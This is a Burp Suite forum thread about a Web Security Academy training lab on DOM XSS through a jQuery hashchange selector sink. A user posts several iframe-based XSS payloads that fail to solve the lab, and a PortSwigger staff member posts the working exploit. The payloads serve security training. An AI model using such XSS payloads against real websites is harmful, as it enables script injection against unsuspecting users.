Burp Suite User Forum

Create new post

No solution seems to work on this lab

Geoffrey | Last updated: Jul 03, 2024 01:32PM UTC

Lab: DOM XSS in jQuery selector sink using a hashchange event I have tried <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print()>'"> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print(1)>'"> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print(1)>'"></iframe> I've tried both with a slash and without a slash between .net and #. Just to see I tried other variations as well. I have tried on edge, embedded, firefox, and chrome. It works when I go to view exploit, but the lab does not get solved when I deliver it.

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 04:37PM UTC

Hi Geoffrey, I have just run through this lab, using the Firefox browser, and the written solution solves the lab so this does appear to be working as expected. I was able to solve the lab by delivering the following exploit in the Exploit Server: <iframe src="https://0ac80082035514098298299200bf00b8.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.